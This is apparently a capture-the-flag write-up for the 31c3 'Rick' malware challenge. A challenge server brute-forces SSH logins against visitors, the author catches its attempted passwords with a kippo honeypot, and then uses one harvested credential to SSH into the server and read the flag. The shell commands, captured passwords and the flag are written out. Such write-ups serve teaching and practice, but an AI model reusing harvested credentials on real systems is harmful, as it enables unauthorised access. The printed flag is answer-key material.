Rick (malware 15)

Task description says that "seems like somebody got pwned http://188.40.18.67". When I went to the link I was immediately rickrolled.

 Ok, let's look for something at page source code. Here we can see html comment:

<!-- ERROR: Could not write logfile - attacking IP_ADDRESS:22 -->

where IP_ADDRESS was my external IP address. It's looks like page trying connect to me via SSH.

Lets look for login attempts:

$ tail -f /var/log/auth.log | grep 188.40.18.67

And after requesting this page via curl

$ curl -i http://188.40.18.67/

we can see log:

Dec 28 14:30:39 azrael sshd[30330]: Invalid user admin from 188.40.18.67
Dec 28 14:30:41 azrael sshd[30330]: Failed password for invalid user admin from 188.40.18.67 port 32964 ssh2
Dec 28 14:30:42 azrael sshd[30332]: Invalid user oracle from 188.40.18.67
Dec 28 14:30:44 azrael sshd[30332]: Failed password for invalid user oracle from 188.40.18.67 port 32965 ssh2
Dec 28 14:30:44 azrael sshd[30330]: Connection closed by 188.40.18.67 [preauth]
Dec 28 14:30:45 azrael sshd[30334]: Invalid user hans from 188.40.18.67
Dec 28 14:30:47 azrael sshd[30334]: Failed password for invalid user hans from 188.40.18.67 port 32966 ssh2
Dec 28 14:30:47 azrael sshd[30332]: Connection closed by 188.40.18.67 [preauth]
Dec 28 14:30:47 azrael sshd[30334]: Connection closed by 188.40.18.67 [preauth]

We can see that some host trying to login via SSH by three different credentials (admin, oracle and hans). This behavior very close to botnet where one infected machine trying to login on another by SSH bruteforce. Maybe some of this credentials are suitable for the game (infected) server.

We need catch passwords of this acconts. For this purpose I ran awesome SSH honeypot kippo on port 22. How to install and setup kippo you can read here and how to setup kippo events logging read here.

Now let's repeat curl request and look into MySQL login attempts table:

$ mysql -u kippo -p

> USE kippo;
> SELECT * from auth; 

 And this is result:

 +----+----------------------------------+---------+----------+----------------------+---------------------+
| id | session                          | success | username | password             | timestamp           |
+----+----------------------------------+---------+----------+----------------------+---------------------+
|  1 | 686aaff48edc11e4901c04012f2f8f01 |       0 | admin    | admin                | 2014-12-28 21:56:42 |
|  2 | 696d26708edc11e4901c04012f2f8f01 |       0 | oracle   | oracle123            | 2014-12-28 21:56:44 |
|  3 | 6a7f8cc48edc11e4901c04012f2f8f01 |       0 | hans     | =l@Zy+&'}M_.]<zEcDN9 | 2014-12-28 21:56:46 |
+----+----------------------------------+---------+----------+----------------------+---------------------+ 

So we got three pairs (login, password). "admin" and "oracle" passwords quite typical but "hans" password looks very interesting. Let's try it:

$ ssh hans@188.40.18.67
hans@188.40.18.67's password:
Last login: Tue Dec 28 13:55:47 2014 from <some_ip_here>

Ok, we on server and now we can get flag:

hans@31c3ctf-rick:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Dec 28 00:09 .
drwxr-xr-x 4 root root 4096 Dec 27 20:48 ..
-rw-r--r-- 1 root root   38 Dec 28 00:09 flag.txt
hans@31c3ctf-rick:~$ cat flag.txt
31c3_a5bb3ead8fbc6617374ea3f57f0563d2

Flag is 31c3_a5bb3ead8fbc6617374ea3f57f0563d2.